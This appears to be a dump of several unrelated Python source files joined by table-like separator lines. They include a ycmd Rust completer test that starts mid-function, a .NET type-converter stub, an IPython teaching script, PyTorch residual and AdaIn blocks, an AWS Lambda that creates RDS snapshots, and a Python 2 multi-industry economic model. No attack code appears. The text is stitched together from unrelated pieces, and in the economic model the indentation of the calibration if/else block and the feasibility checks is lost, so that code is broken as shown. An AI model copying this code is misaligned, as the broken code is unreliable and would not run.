  """GetDoc on an undocumented function reports a RuntimeError."""
  filepath = PathToTestFile( 'docs.rs' )
  # no docs exist for this function
  request = BuildRequest( filepath = filepath,
                          filetype = 'rust',
                          line_num = 8,
                          column_num = 9,
                          contents = ReadFile( filepath ),
                          command_arguments = [ 'GetDoc' ],
                          completer_target = 'filetype_default' )
  response = app.post_json( '/run_completer_command',
                            request,
                            expect_errors = True ).json
  eq_( response[ 'exception' ][ 'TYPE' ], 'RuntimeError' )
  eq_( response[ 'message' ], 'Can\'t lookup docs.' )
@IsolatedYcmd()
@patch( 'ycmd.utils.WaitUntilProcessIsTerminated',
        MockProcessTerminationTimingOut )
def Subcommands_StopServer_Timeout_test( app ):
  # StopServer must still mark the completer server as stopped even when
  # waiting for process termination times out (forced by the patch above).
  WaitUntilCompleterServerReady( app, 'rust' )
  app.post_json(
    '/run_completer_command',
    BuildRequest(
      filetype = 'rust',
      command_arguments = [ 'StopServer' ]
    )
  )
  # After StopServer, debug info must report the server as not running.
  request_data = BuildRequest( filetype = 'rust' )
  assert_that( app.post_json( '/debug_info', request_data ).json,
               has_entry(
                 'completer',
                 has_entry( 'servers', contains(
                   has_entry( 'is_running', False )
                 ) )
               ) )
| 4,364 | 1,275 |
class FontFamilyConverter(TypeConverter):
    """Type converter between System.String and System.Windows.Media.FontFamily.

    Stub for the .NET ``FontFamilyConverter`` type; the real implementations
    live in the CLR, so every body here is a no-op.

    FontFamilyConverter()
    """
    def CanConvertFrom(self, *__args):
        """Return True when a value of type ``t`` can become a FontFamily.

        CanConvertFrom(self: FontFamilyConverter, td: ITypeDescriptorContext, t: Type) -> bool
        """
        pass

    def CanConvertTo(self, *__args):
        """Return True when a FontFamily can convert to ``destinationType``.

        CanConvertTo(self: FontFamilyConverter, context: ITypeDescriptorContext, destinationType: Type) -> bool
        """
        pass

    def ConvertFrom(self, *__args):
        """Convert object ``o`` into a FontFamily instance.

        ConvertFrom(self: FontFamilyConverter, context: ITypeDescriptorContext, cultureInfo: CultureInfo, o: object) -> object
        """
        pass

    def ConvertTo(self, *__args):
        """Convert FontFamily ``value`` into ``destinationType``.

        ConvertTo(self: FontFamilyConverter, context: ITypeDescriptorContext, culture: CultureInfo, value: object, destinationType: Type) -> object
        """
        pass
"""
Demonstrating simple global variables
File: E5_global_variables_version_b.py
Author: Charles Stanier, charles-stanier@uiowa.edu
Date: August 14, 2019
Written/Tested In: Python 3.7.3
Program Objective: Demonstrate the use of global variable for constant
Modifications: none so far
"""
# these two lines of code make sure we clear the variable space
# this causes an error from spyder at the end of running the script
# but I would ignore it
# NOTE(review): this requires an IPython kernel; under plain CPython
# get_ipython() returns None and the next line raises AttributeError.
from IPython import get_ipython
get_ipython().magic('reset -f')
def print_number(val):
    """Print *val*, appending '!!!!' when the config flag is exactly True."""
    if cfg.exclaim_flag == True:  # deliberate exact-True comparison
        print('The value is ', val, '!!!!')
        return
    print('The value is ', val)
# main script
# cfg must be imported before print_number() runs: the function reads the
# module-level flag cfg.exclaim_flag at call time.
import myconfig as cfg # import configuration parameters
print_number(3.9)
# Input (feature) and output (target) variable names used by the model.
X_VAR = ["Tx", "Ty", "Wx", "Wy", "u_av", "v_av", "lon", "lat", "t"]
Y_VAR = ["u", "v"]
# Matplotlib rcParams overrides: LaTeX text rendering, Times New Roman.
mpl_config = {
    "text.usetex": True,
    "font.size": 12,
    "text.latex.preamble": r"\usepackage{amsmath}",
    "font.family": "Times New Roman",
}
| 240 | 111 |
""" In this file, PyTorch modules are defined to be used in the Talking Heads model. """
import torch
import torch.nn as nn
from torch.nn import functional as F
def init_conv(conv):
    """Xavier-initialise a conv layer's weight and zero its bias, if any."""
    nn.init.xavier_uniform_(conv.weight)
    bias = conv.bias
    if bias is not None:
        bias.data.zero_()
# region General Blocks
class SelfAttention(nn.Module):
    """Self-attention over spatial positions (SAGAN-style) with a learned
    residual gate ``gamma``."""

    def __init__(self, in_dim):
        super(SelfAttention, self).__init__()
        # Submodule creation order is kept so parameter init matches.
        self.query_conv = nn.Conv2d(in_channels=in_dim, out_channels=in_dim // 8, kernel_size=1)
        self.key_conv = nn.Conv2d(in_channels=in_dim, out_channels=in_dim // 8, kernel_size=1)
        self.value_conv = nn.Conv2d(in_channels=in_dim, out_channels=in_dim, kernel_size=1)
        # Residual gate, initialised near zero.
        self.gamma = nn.Parameter(torch.rand(1).normal_(0.0, 0.02))
        self.softmax = nn.Softmax(dim=-1)

    def forward(self, x):
        batch, channels, height, width = x.shape
        positions = width * height
        # (B, N, C//8) x (B, C//8, N) -> (B, N, N) attention map.
        queries = self.query_conv(x).view(batch, -1, positions).permute(0, 2, 1)
        keys = self.key_conv(x).view(batch, -1, positions)
        attention = self.softmax(torch.bmm(queries, keys))
        values = self.value_conv(x).view(batch, -1, positions)
        attended = torch.bmm(values, attention.permute(0, 2, 1))
        attended = attended.view(batch, channels, height, width)
        return self.gamma * attended + x
class ConvLayer(nn.Module):
    """Reflection-padded Conv2d wrapped in spectral normalisation.

    ``padding`` defaults to ``kernel_size // 2`` ("same" padding for odd
    kernels with stride 1).
    """

    def __init__(self, in_channels, out_channels, kernel_size, stride, padding=None):
        super(ConvLayer, self).__init__()
        pad = kernel_size // 2 if padding is None else padding
        self.reflection_pad = nn.ReflectionPad2d(pad)
        self.conv2d = nn.utils.spectral_norm(nn.Conv2d(in_channels, out_channels, kernel_size, stride))

    def forward(self, x):
        return self.conv2d(self.reflection_pad(x))
class AdaIn(nn.Module):
    """Adaptive instance normalisation: whiten per-channel spatial stats,
    then re-style with the supplied mean/std."""

    def __init__(self):
        super(AdaIn, self).__init__()
        self.eps = 1e-5  # numerical floor added to the per-channel std

    def forward(self, x, mean_style, std_style):
        batch, channels, height, width = x.shape
        flat = x.view(batch, channels, -1)
        feat_std = (torch.std(flat, dim=2) + self.eps).view(batch, channels, 1)
        feat_mean = torch.mean(flat, dim=2).view(batch, channels, 1)
        # Same association order as the original for bit-identical results.
        styled = std_style * (flat - feat_mean) / feat_std + mean_style
        return styled.view(batch, channels, height, width)
# endregion
# region Non-Adaptive Residual Blocks
class ResidualBlockDown(nn.Module):
    """Residual block that halves spatial resolution via average pooling."""

    def __init__(self, in_channels, out_channels, kernel_size=3, stride=1, padding=None):
        super(ResidualBlockDown, self).__init__()
        # Main (right) branch: two padded convolutions.
        self.conv_r1 = ConvLayer(in_channels, out_channels, kernel_size, stride, padding)
        self.conv_r2 = ConvLayer(out_channels, out_channels, kernel_size, stride, padding)
        # Skip (left) branch: 1x1 projection to match channel count.
        self.conv_l = ConvLayer(in_channels, out_channels, 1, 1)

    def forward(self, x):
        main = self.conv_r1(F.relu(x))
        main = self.conv_r2(F.relu(main))
        main = F.avg_pool2d(main, 2)
        skip = F.avg_pool2d(self.conv_l(x), 2)
        return skip + main
class ResidualBlockUp(nn.Module):
    """Residual block that upsamples by ``upsample`` before convolving."""

    def __init__(self, in_channels, out_channels, kernel_size=3, stride=1, upsample=2):
        super(ResidualBlockUp, self).__init__()
        # General
        self.upsample = nn.Upsample(scale_factor=upsample, mode='nearest')
        # Main (right) branch: norm -> relu -> upsample -> conv, twice.
        self.norm_r1 = nn.InstanceNorm2d(in_channels, affine=True)
        self.conv_r1 = ConvLayer(in_channels, out_channels, kernel_size, stride)
        self.norm_r2 = nn.InstanceNorm2d(out_channels, affine=True)
        self.conv_r2 = ConvLayer(out_channels, out_channels, kernel_size, stride)
        # Skip (left) branch: upsample then 1x1 projection.
        self.conv_l = ConvLayer(in_channels, out_channels, 1, 1)

    def forward(self, x):
        main = self.upsample(F.relu(self.norm_r1(x)))
        main = self.conv_r1(main)
        main = self.conv_r2(F.relu(self.norm_r2(main)))
        skip = self.conv_l(self.upsample(x))
        return skip + main
class ResidualBlock(nn.Module):
    """Plain residual block: two conv + instance-norm stages, identity skip."""

    def __init__(self, channels):
        super(ResidualBlock, self).__init__()
        self.conv1 = ConvLayer(channels, channels, kernel_size=3, stride=1)
        self.in1 = nn.InstanceNorm2d(channels, affine=True)
        self.conv2 = ConvLayer(channels, channels, kernel_size=3, stride=1)
        self.in2 = nn.InstanceNorm2d(channels, affine=True)

    def forward(self, x):
        main = F.relu(self.in1(self.conv1(x)))
        main = self.in2(self.conv2(main))
        return main + x
# endregion
# region Adaptive Residual Blocks
class AdaptiveResidualBlockUp(nn.Module):
    """Upsampling residual block whose normalisation stats come from AdaIn.

    ``mean1``/``std1`` condition the first stage (``in_channels`` wide) and
    ``mean2``/``std2`` the second (``out_channels`` wide).
    """

    def __init__(self, in_channels, out_channels, kernel_size=3, stride=1, upsample=2):
        super(AdaptiveResidualBlockUp, self).__init__()
        self.in_channels = in_channels
        self.out_channels = out_channels
        # General
        self.upsample = nn.Upsample(scale_factor=upsample, mode='nearest')
        # Main (right) branch.
        self.norm_r1 = AdaIn()
        self.conv_r1 = ConvLayer(in_channels, out_channels, kernel_size, stride)
        self.norm_r2 = AdaIn()
        self.conv_r2 = ConvLayer(out_channels, out_channels, kernel_size, stride)
        # Skip (left) branch.
        self.conv_l = ConvLayer(in_channels, out_channels, 1, 1)

    def forward(self, x, mean1, std1, mean2, std2):
        main = self.upsample(F.relu(self.norm_r1(x, mean1, std1)))
        main = self.conv_r1(main)
        main = self.conv_r2(F.relu(self.norm_r2(main, mean2, std2)))
        skip = self.conv_l(self.upsample(x))
        return skip + main
class AdaptiveResidualBlock(nn.Module):
    """Residual block with two AdaIn-conditioned convolution stages.

    Bug fix: the second AdaIn stage now uses ``mean2``/``std2``; the
    original passed ``mean1``/``std1`` twice, leaving the second style
    statistics silently unused (the stray ``temp`` local is also removed).
    """

    def __init__(self, channels):
        super(AdaptiveResidualBlock, self).__init__()
        self.conv1 = ConvLayer(channels, channels, kernel_size=3, stride=1)
        self.in1 = AdaIn()
        self.conv2 = ConvLayer(channels, channels, kernel_size=3, stride=1)
        self.in2 = AdaIn()

    def forward(self, x, mean1, std1, mean2, std2):
        residual = x
        out = self.conv1(x)
        out = self.in1(out, mean1, std1)
        out = F.relu(out)
        out = self.conv2(out)
        # Condition the second stage on the second set of style stats.
        out = self.in2(out, mean2, std2)
        return out + residual
# endregion
| 7,121 | 2,675 |
import botocore
import datetime
import re
import logging
import boto3
# AWS region the RDS client targets.
region='us-west-1'
# NOTE(review): the two settings below are never read in this module.
db_instance_class='db.m4.large'
db_subnet='default'
# RDS instance identifiers to snapshot on every invocation.
instances = ['master']
print('Loading function')
def lambda_handler(event, context):
    """AWS Lambda entry point: create a timestamped RDS snapshot of each
    configured instance.  ``event`` and ``context`` are the standard Lambda
    arguments and are not used here.
    """
    source = boto3.client('rds', region_name=region)
    for instance in instances:
        try:
            #timestamp1 = '{%Y-%m-%d %H:%M:%S}'.format(datetime.datetime.now())
            # NOTE(review): '%-M' (unpadded minute) is a glibc extension and
            # is not portable; '%M' is the standard directive — confirm the
            # unpadded form is intentional.
            timestamp1 = str(datetime.datetime.now().strftime('%Y-%m-%d-%H-%-M-%S')) + "lambda-snap"
            snapshot = "{0}-{1}-{2}".format("mysnapshot", instance,timestamp1)
            response = source.create_db_snapshot(DBSnapshotIdentifier=snapshot, DBInstanceIdentifier=instance)
            print(response)
        except botocore.exceptions.ClientError as e:
            raise Exception("Could not create snapshot: %s" % e)
'''
------------------------------------------------------------------------
This program runs the steady state solver as well as the time path
solver for the OG model with S-period lived agents, exogenous labor,
M industries, and I goods.
This Python script calls the following other file(s) with the associated
functions:
sfuncs.py
feasible
SS
tpfuncs.py
TPI
------------------------------------------------------------------------
'''
# Import packages
import time
import numpy as np
import scipy.optimize as opt
import pandas as pd
import ssfuncs_static as ssf
reload(ssf)
import tpfuncs_static as tpf
reload(tpf)
import matplotlib
import matplotlib.pyplot as plt
from matplotlib.ticker import MultipleLocator, FormatStrFormatter
from mpl_toolkits.mplot3d import Axes3D
'''
------------------------------------------------------------------------
Declare parameters
------------------------------------------------------------------------
S = integer in [3,80], number of periods an individual lives
T = integer > S, number of time periods until steady state
I = integer, number of consumption goods
alpha = [I,] vector, ith element is the expenditure share on
good i (elements must sum to one)
c_bar = [I,] vector, ith element is the minimum consumption
amount for good i
beta_ann = scalar in [0,1), discount factor for one year
beta = scalar in [0,1), discount factor for each model period
sigma = scalar > 0, coefficient of relative risk aversion
n = [S,] vector, exogenous labor supply n_{s,t}
M = integer, number of production industries
A = [M,] vector, mth element is the total factor productivity
values for the mth industry
gamma = [M,] vector, mth element is capital's share of income
for the mth industry
epsilon = [M,] vector, mth element is the elasticity of substitution
between capital and labor for the mth industry
delta_annual = [M,] vector, mth element is the one-year physical depreciation
rate of capital in the mth industry
delta = [M,] vector, mth element is the model-period physical depreciation
rate of capital in the mth industry
xi = [M,M] matrix, element i,j gives the fraction of capital used by
industry j that comes from the output of industry i
pi = [I,M] matrix, element i,j gives the fraction of consumption
good i that comes from the output of industry j
ss_tol = scalar > 0, tolerance level for steady-state fsolve
ss_graphs = boolean, =True if want graphs of steady-state objects
tp_solve = boolean, =True if want to solve TPI after solving SS
tp_tol = scalar > 0, tolerance level for fsolve's in TP
tp_graphs = boolean, =True if want graphs of TP objects
------------------------------------------------------------------------
'''
# Household parameters
# NOTE: this file is Python 2; 80 / S below is integer division by design
# when S divides 80 evenly.
S = int(80)   # periods an individual lives
T = 220       # periods until the steady state
beta_annual = 0.96
beta = beta_annual ** (80 / S)   # discount factor per model period
sigma = 3.0   # coefficient of relative risk aversion
n = np.zeros(S)   # exogenous labor supply: full until 2/3 of life, then 0.9
n[:int(round(2 * S / 3))] = 1.
n[int(round(2 * S / 3)):] = 0.9
# Model calibation parameters
FR1993_calib = False # if True, then calibration firm params to
# Fullerton and Rogers (Brookings, 1993)
if FR1993_calib == True:
# Specify model dimensions
I = 17 # number of consumption goods
M = 19 # number of production industries
# Read in parameters from Fullerton and Rogers (1993) from excel file
xi_sheet = pd.read_excel('Firm_Parameters_FullertonRogers.xlsx', sheetname='xi')
xi = xi_sheet.as_matrix() # turn into numpy array
xi=xi[0:19,1:20] # keep only cells interested in
xi=xi.astype(float) # make sure type is float
xi = (xi/np.tile(xi.sum(0),(M,1))).transpose() # make xi so fractions and so rows are capital used in and columns are capital supplied in (MxM)
#print 'xi sum check: ', xi.sum(1)
pi_sheet = pd.read_excel('Firm_Parameters_FullertonRogers.xlsx', sheetname='pi')
pi = pi_sheet.as_matrix()
pi=pi[0:19,1:18]
pi=pi.astype(float)
pi = (pi/np.tile(pi.sum(0),(M,1))).transpose() # make pi so fractions and so rows are consumption goods and columns are output industries in (IxM)
#print 'pi sum check: ', pi.sum(1)
delta_sheet = pd.read_excel('Firm_Parameters_FullertonRogers.xlsx', sheetname='delta')
delta = delta_sheet.as_matrix()
delta=delta[0:19,1]
delta=delta.astype(float)
#print 'delta shape: ', delta.shape
gamma_sheet = pd.read_excel('Firm_Parameters_FullertonRogers.xlsx', sheetname='gamma')
gamma = gamma_sheet.as_matrix()
gamma=gamma[0:19,1]
gamma=gamma.astype(float)
epsilon_sheet = pd.read_excel('Firm_Parameters_FullertonRogers.xlsx', sheetname='epsilon')
epsilon = epsilon_sheet.as_matrix()
epsilon=epsilon[0:19,1]
epsilon=epsilon.astype(float)
alpha_sheet = pd.read_excel('Firm_Parameters_FullertonRogers.xlsx', sheetname='alpha')
alpha = alpha_sheet.as_matrix()
alpha =alpha[0:17,1]
alpha =alpha.astype(float)
alpha = alpha/alpha.sum() # ensure the alpha vector sums to one
cbar_sheet = pd.read_excel('Firm_Parameters_FullertonRogers.xlsx', sheetname='cbar')
c_bar = cbar_sheet.as_matrix()
c_bar =c_bar[0:17,1]
c_bar =c_bar.astype(float)
# No TFP from FR1993, so just set to one for all
A = np.ones((M,))
else:
# Firm/consumption parameters
I = 2
alpha = np.array([0.4,0.6])
#c_bar = np.array([0.6, 0.6])
c_bar = np.array([0.0, 0.0])
M = 2
A = np.array([1, 1.2])
gamma = np.array([0.15, 0.2])
epsilon = np.array([0.6, 0.6])
delta_annual = np.array([0.04,0.05])
delta = 1 - ((1-delta_annual)**(80/S))
xi = np.array([[1.0, 0.0],[0.0, 1.0] ])
pi = np.array([[1.0, 0.0],[0.0, 1.0] ])
# M = 3
# A = np.array([1, 1.2, 0.9])
# gamma = np.array([0.3, 0.25, 0.4])
# delta = np.array([0.1, 0.12, 0.15])
# epsilon = np.array([0.55, 0.6, 0.62])
# pi = np.array([[0.4, 0.3, 0.3],[0.1, 0.8, 0.1]])
# xi = np.array([[0.2, 0.6, 0.2],[0.0, 0.2, 0.8], [0.6, 0.2, 0.2] ])
# SS parameters
ss_tol = 1e-13      # fsolve tolerance for the steady-state solver
ss_graphs = False   # produce steady-state plots?
# TP parameters
tp_solve = True     # solve the transition path after the steady state
tp_graphs = False   # produce transition-path plots?
tp_tol = 1e-9 # tolerance for fsolve for TP and for HH prob along time path
'''
------------------------------------------------------------------------
Compute the steady state
------------------------------------------------------------------------
rbar_init = scalar > 1, initial guess for steady-state model period
interest rate
wbar_init = scalar > 1, initial guess for steady-state real wage
rwbar_init = [2,] vector, initial guesses for steady-state r and w
feas_params = length 5 tuple, parameters for feasible function:
(S, alpha, beta, sigma, ss_tol)
b_guess = [S-1,] vector, initial guess for savings to use in fsolve
in ssf.get_cbess
GoodGuess = boolean, =True if initial steady-state guess is feasible
r_cstr_ss = boolean, =True if initial r + delta <= 0
w_cstr_ss = boolean, =True if initial w <= 0
c_tilde_cstr_ss = [S,] boolean vector, =True if c_tilde_{s}<=0 for initial r and w
c_cstr_ss = [I, S] boolean matrix, =True if c_{i,s}<=0 for initial r
and w
K_cstr_ss = boolean, =True if sum of K_{m}<=0 for initial r and w
ss_params = length 5 tuple, parameters for SS function:
(S, alpha, beta, sigma, ss_tol)
r_ss = scalar, steady-state interest rate
w_ss = scalar > 0, steady-state wage
p_c_ss = [I,] vector, steady-state prices for each consumption good
p_tilde_ss = scalar > 0, steady-state composite good price
b_ss = [S-1,] vector, steady-state savings
c_tilde_ss = [S,] vector, steady-state composite consumption
c_ss = [I,S] matrix, steady-state consumption of each good
eul_ss = [S-1,] vector, steady-state Euler errors
Cm_ss = [M,] vector, total demand for goods from each industry
X_ss = [M,] vector, steady-state total output for each industry
K_ss = [M,] vector, steady-state capital demand for each industry
L_ss = [M,] vector, steady-state labor demand for each industry
MCK_err_ss = scalar, steady-state capital market clearing error
MCL_err_ss = scalar, steady-state labor market clearing error
ss_time = scalar, number of seconds to compute SS solution
rcdiff_ss = [M,] vector, steady-state difference in goods market
clearing (resource constraint) in each industry
------------------------------------------------------------------------
'''
# Make sure initial guess of r and w is feasible
# 4% annual interest compounded up to one model period.
rbar_init = ((1 + 0.04) ** (80 / S)) - 1
wbar_init = 1.
rwbar_init = np.array([rbar_init, wbar_init])
feas_params = (S, alpha, beta, sigma, ss_tol)
# Hump-shaped savings guess: rising over the first 2/3 of life, then falling.
b_guess = np.zeros(S-1)
b_guess[:int(round(2 * S / 3))] = \
    (np.linspace(0.003, 0.3, int(round(2 * S / 3))))
b_guess[int(round(2 * S / 3)):] = \
    (np.linspace(0.3, 0.003, S - 1 - int(round(2 * S / 3))))
GoodGuess, r_cstr_ss, w_cstr_ss, c_tilde_cstr_ss, c_cstr_ss, K_cstr_ss \
    = ssf.feasible(feas_params, rwbar_init, b_guess, c_bar, A,
    gamma, epsilon, delta, pi, I, S, n)
if r_cstr_ss == True and w_cstr_ss == True:
print 'Initial guess is not feasible because both r + delta, w <= 0.'
elif r_cstr_ss == True and w_cstr_ss == False:
print 'Initial guess is not feasible because r + delta <= 0.'
elif r_cstr_ss == False and w_cstr_ss == True:
print 'Initial guess is not feasible because w <= 0.'
elif (r_cstr_ss == False and w_cstr_ss == False and c_tilde_cstr_ss.max() == 1
and K_cstr_ss == False):
print 'Initial guess is not feasible because c_tilde_{s}<=0 for some s.'
elif (r_cstr_ss == False and w_cstr_ss == False and c_tilde_cstr_ss.max() == 1
and K_cstr_ss == True):
print 'Initial guess is not feasible because c_tilde_{s}<=0 for some s and sum of K_{m}<=0.'
elif (r_cstr_ss == False and w_cstr_ss == False and c_tilde_cstr_ss.max() == 0
and c_cstr_ss.max() == 1 and K_cstr_ss == False):
print 'Initial guess is not feasible because c_{i,s}<=0 for some i and s.'
elif (r_cstr_ss == False and w_cstr_ss == False and c_tilde_cstr_ss.max() == 0
and c_cstr_ss.max() == 1 and K_cstr_ss == True):
print 'Initial guess is not feasible because c_{i,s}<=0 for some i and s and sum of K_{m}<=0.'
elif (r_cstr_ss == False and w_cstr_ss == False and c_tilde_cstr_ss.max() == 0
and c_cstr_ss.max() == 0 and K_cstr_ss == True):
print 'Initial guess is not feasible because sum of K_{m}<=0.'
elif GoodGuess == True:
print 'Initial guess is feasible.'
# Compute steady state
print 'BEGIN STEADY STATE COMPUTATION'
# Parameters consumed by the steady-state solver.
ss_params = (S, alpha, beta, sigma, ss_tol)
# Solve for the steady state: prices (r, w, consumption-good prices p_c,
# composite price p_tilde), household distributions (savings b, composite
# consumption c_tilde, goods consumption c), Euler errors, aggregates
# (C, X, K, L), market-clearing errors and solver wall-clock time.
(r_ss, w_ss, p_c_ss, p_tilde_ss, b_ss, c_tilde_ss, c_ss, eul_ss, C_ss, X_ss,
    K_ss, L_ss, MCK_err_ss, MCL_err_ss, ss_time) = \
    ssf.SS(ss_params, rwbar_init, b_guess, c_bar, A,
    gamma, epsilon, delta, xi, pi, I, M, S, n, ss_graphs)
# Print diagnostics
print 'The maximum absolute steady-state Euler error is: ', \
    np.absolute(eul_ss).max()
print 'The capital and labor market clearing errors are: ', \
    (MCK_err_ss, MCL_err_ss)
print 'The steady-state distribution of capital is:'
print b_ss
print 'The steady-state distribution of composite consumption is:'
print c_tilde_ss
print 'The steady-state distribution of goods consumption is:'
print c_ss
print 'The steady-state interest rate and wage:'
print np.array([r_ss, w_ss])
print 'Steady-state consumption good prices and composite price are:'
print p_c_ss, p_tilde_ss
print 'Aggregate output, capital stock and consumption for each industry/consumption good are:'
print np.array([[X_ss], [K_ss], [C_ss]])
# Goods-market (resource constraint) residual: industry output less
# consumption demand and replacement investment; should be ~0 per industry.
RCdiff_ss = X_ss - (np.dot(np.reshape(C_ss,(1,I)),pi)) - (np.dot(delta*K_ss,xi))
print 'The difference in the resource constraints are: ', RCdiff_ss
# Print SS computation time, formatted as sec / min / hrs / days.
if ss_time < 60: # seconds
    secs = round(ss_time, 3)
    print 'SS computation time: ', secs, ' sec'
elif ss_time >= 60 and ss_time < 3600: # minutes
    mins = int(ss_time / 60)
    secs = round(((ss_time / 60) - mins) * 60, 1)
    print 'SS computation time: ', mins, ' min, ', secs, ' sec'
elif ss_time >= 3600 and ss_time < 86400: # hours
    hrs = int(ss_time / 3600)
    mins = int(((ss_time / 3600) - hrs) * 60)
    secs = round(((ss_time / 60) - mins) * 60, 1)
    print 'SS computation time: ', hrs, ' hrs, ', mins, ' min, ', secs, ' sec'
elif ss_time >= 86400: # days
    days = int(ss_time / 86400)
    hrs = int(((ss_time / 86400) - days) * 24)
    mins = int(((ss_time / 3600) - hrs) * 60)
    secs = round(((ss_time / 60) - mins) * 60, 1)
    print 'SS computation time: ', days, ' days,', hrs, ' hrs, ', mins, ' min, ', secs, ' sec'
'''
--------------------------------------------------------------------
Compute the equilibrium time path by TPI
--------------------------------------------------------------------
Gamma1 = [S-1,] vector, initial period savings distribution
rpath_init = [T+S-1,] vector, initial guess for the time path of
the interest rate
r1 = scalar > 0, guess for period 1 value of r
cc_r = scalar, parabola coefficient for rpath_init
bb_r = scalar, parabola coefficient for rpath_init
aa_r = scalar, parabola coefficient for rpath_init
wpath_init = [T+S-1,] vector, initial guess for the time path of
the wage
w1 = scalar > 0, guess for period 1 value of w
cc_w = scalar, parabola coefficient for wpath_init
bb_w = scalar, parabola coefficient for wpath_init
aa_w = scalar, parabola coefficient for wpath_init
tp_params = length 11 tuple, parameters to pass into TP function:
(S, T, alpha_path, beta, sigma, r_ss, w_ss, tp_tol)
alpha_path = [I,T+S-2] matrix, consumption good shares in each
period along time path
c_bar_path = [I,T+S-2] matrix, minimum consumption amounts in each
period along time path
A_path = [M,T+S-2] matrix, TFP for each industry in each
period along time path
gamma_path = [M,T+S-2] matrix, capital's share of output for each industry in each
period along time path
epsilon_path = [M,T+S-2] matrix, elasticity of substitution for each industry in each
period along time path
delta_path = [M,T+S-2] matrix, physical depreciation for each industry in each
period along time path
r_path = [T+S-2,] vector, equilibrium time path of the interest
rate
w_path = [T+S-2,] vector, equilibrium time path of the wage
pm_path = [M, T+S-2] matrix, equilibrium time path of industry
output prices
pc_path = [I, T+S-2] matrix, equilibrium time path of consumption
good prices
p_tilde_path = [T+S-2,] vector, equilibrium time path of the
composite good price
b_path = [S-1, T+S-2] matrix, equilibrium time path of the
distribution of savings. Period 1 is the initial
exogenous distribution
c_tilde_path = [S, T+S-2] matrix, equilibrium time path of the
distribution of composite good consumption
c_path = [S, T+S-2, I] array, equilibrium time path of the
distribution of individual consumption goods
eul_path = [S-1, T+S-2] matrix, equilibrium time path of the
euler errors associated with the distribution of
savings. Period 1 is a column of zeros
C_path = [I, T+S-2] matrix, equilibrium time path of total
demand for each consumption good
X_path = [M, T+S-2] matrix, equilibrium time path of total
output from each industry
K_path = [M, T+S-2] matrix, equilibrium time path of capital
demand for each industry
L_path = [M, T+S-2] matrix, equilibrium time path of labor
demand for each industry
Inv_path = [M,T+S-2] matrix, equilibrium time path for investment
demand from each industry
X_c_path     = [M,T+S-2] matrix, equilibrium time path for demand
               for output from each industry from consumption demand
X_inv_path   = [M,T+S-2] matrix, equilibrium time path for demand
               for output from each industry from investment demand
MCKerr_path = [T+S-2,] vector, equilibrium time path of capital
market clearing errors
MCLerr_path = [T+S-2,] vector, equilibrium time path of labor market
clearing errors
tpi_time = scalar, number of seconds to solve for transition path
ResmDiff = [M, T-1] matrix, errors in the resource constraint
from period 1 to T-1. We don't use T because we are
missing one individual's consumption in that period
--------------------------------------------------------------------
'''
if tp_solve == True:
    print 'BEGIN EQUILIBRIUM TIME PATH COMPUTATION'
    # Start the economy slightly below its steady-state savings so the
    # transition path is non-trivial.
    #Gamma1 = b_ss
    Gamma1 = 0.95 * b_ss
    # Make sure initial savings distr. is feasible (sum of b_{s}>0)
    if Gamma1.sum() <= 0:
        print 'Initial savings distribution is not feasible (sum of b_{s}<=0)'
    else:
        # Choose initial guesses of path of interest rate and wage.
        # Use parabola specification aa*x^2 + bb*x + cc
        # The parabola starts at r1 (resp. w1) in period 0 and flattens out
        # at the steady-state value by period T-S; the guess is held at the
        # steady state thereafter.
        # rpath_init = r_ss * np.ones(T+S-1)
        rpath_init = np.zeros(T+S-1)
        r1 = 1.02 * r_ss
        cc_r = r1
        bb_r = - 2 * (r1 - r_ss) / (T - S)
        aa_r = -bb_r / (2 * (T - S))
        rpath_init[:T-S+1] = (aa_r * (np.arange(0, T-S+1) ** 2) +
            (bb_r * np.arange(0, T-S+1)) + cc_r)
        rpath_init[T-S+1:] = r_ss
        #rpath_init[:] = r_ss
        wpath_init = np.zeros(T+S-1)
        w1 = 0.98 * w_ss
        cc_w = w1
        bb_w = - 2 * (w1 - w_ss) / (T - S)
        aa_w = -bb_w / (2 * (T - S))
        wpath_init[:T-S+1] = (aa_w * (np.arange(0, T-S+1) ** 2) +
            (bb_w * np.arange(0, T-S+1)) + cc_w)
        wpath_init[T-S+1:] = w_ss
        #wpath_init[:] = w_ss
        # Solve for time path
        # Tile arrays of time path parameters so easy to handle in
        # TP functions (each parameter is constant along the path here).
        alpha_path = np.tile(np.reshape(alpha,(I,1)),(1,len(rpath_init)))
        c_bar_path = np.tile(np.reshape(c_bar,(I,1)),(1,len(rpath_init)))
        A_path = np.tile(np.reshape(A,(M,1)),(1,len(rpath_init)))
        gamma_path = np.tile(np.reshape(gamma,(M,1)),(1,len(rpath_init)))
        epsilon_path = np.tile(np.reshape(epsilon,(M,1)),(1,len(rpath_init)))
        delta_path = np.tile(np.reshape(delta,(M,1)),(1,len(rpath_init)))
        tp_params = (S, T, alpha_path, beta, sigma, r_ss, w_ss, tp_tol)
        # Stack the r and w guesses into the single unknown vector fsolve expects.
        guesses = np.append(rpath_init[:T], wpath_init[:T])
        # NOTE(review): time.clock() was removed in Python 3.8; fine under
        # Python 2 (which this script targets), but switch to time.time()
        # if the script is ever ported.
        start_time = time.clock()
        solutions = opt.fsolve(tpf.TP_fsolve, guesses, args=(tp_params, K_ss, X_ss,
            Gamma1, c_bar_path, A_path, gamma_path, epsilon_path, delta_path, xi, pi, I, M, S, n,
            tp_graphs), xtol=tp_tol, col_deriv=1)
        #solutions = tpf.TP_fsolve(guesses, tp_params, K_ss, X_ss,
        #    Gamma1, c_bar_path, A_path, gamma_path, epsilon_path, delta_path, xi, pi, I, M, S, n,
        #    tp_graphs)
        tpi_time = time.clock() - start_time
        # Split the fsolve solution back into the r and w paths.
        rpath = solutions[:T].reshape(T)
        wpath = solutions[T:].reshape(T)
        # run one iteration of TP with fsolve solution to get other output
        tp_params = (S, T, alpha_path, beta, sigma, r_ss, w_ss, tp_tol)
        (r_path, w_path, pc_path, p_tilde_path, b_path, c_tilde_path, c_path,
            eul_path, C_path, X_path, K_path, L_path,
            MCKerr_path, MCLerr_path, RCdiff_path) = \
            tpf.TP(tp_params, rpath, wpath, K_ss, X_ss,
            Gamma1, c_bar_path, A_path, gamma_path, epsilon_path, delta_path, xi, pi, I,
            M, S, n, tp_graphs)
        # Print diagnostics
        print 'The max. absolute difference in the resource constraints are:'
        print np.absolute(RCdiff_path).max(axis=1)
        print 'The max. absolute error in the market clearing conditions are:'
        print np.absolute(MCKerr_path).max(), np.absolute(MCLerr_path).max()
        # Print TPI computation time, formatted as sec / min / hrs / days.
        if tpi_time < 60: # seconds
            secs = round(tpi_time, 3)
            print 'TPI computation time: ', secs, ' sec'
